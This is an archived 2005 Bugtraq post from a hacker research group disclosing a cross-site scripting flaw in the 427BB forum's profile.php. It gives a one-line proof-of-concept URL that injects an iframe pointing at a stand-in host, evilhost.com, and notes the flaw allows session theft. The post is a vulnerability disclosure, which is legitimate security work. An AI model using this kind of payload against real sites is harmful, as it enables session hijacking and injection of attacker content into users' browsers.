427BB profile.php XSS vulnerability.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 427BB profile.php XSS vulnerability.
From: Raven <raven@xxxxxxxxxxxxxxxx>
Date: 1 Mar 2005 00:37:06 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG007 
 [] Monday 03/01/05 
 [] 427BB  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
  
 Vulnerable: 427BB (Any Version)  
  
  
 ---  
  
 General Information:  
  
 427BB Is a simple board and I have no idea why I'm 
releasing this because Its Very unpopular But I said 
What the hell. Its based on PHP And MySQL  
  
 ---  
  
 Description:  
  
 In profile.php there is a user var that is 
vulnerable to a XSS attack by a remote attacker. The 
user string isn't filtered of < > or ". This makes is 
very easy for a attacker to steal a session and many 
other things.  
  
 ---  
  
 PoC Code  
 Place the following code into the the url then 
reload the profile page and it will execute this 
code.  
  
 
profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E
  
  
 This is very unsafe and vuln because you can execute 
any code you would like and can lead to manger damage 
of the forum you are attacking.  
  
 ---  
  
 Fix and Vendor status:  
  
Vendor has been notified, expect official patch soon. 
  
 ---  
  
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
Partial credit is also given to 
lancastertechnologies.org, founded by JWT. 
 
 
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG007 
 [] Monday 03/01/05 
 [] 427BB  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]

Prev by Date: Re: Firefox Software Update
Next by Date: Software PBLang 4.63 sendpm.php reply file read vulnerability
Previous by thread: 427BB profile.php XSS vulnerability.
Next by thread: [KDE Security Advisory] kppp Privileged fd Leak Vulnerability
Index(es):
- Date
- Thread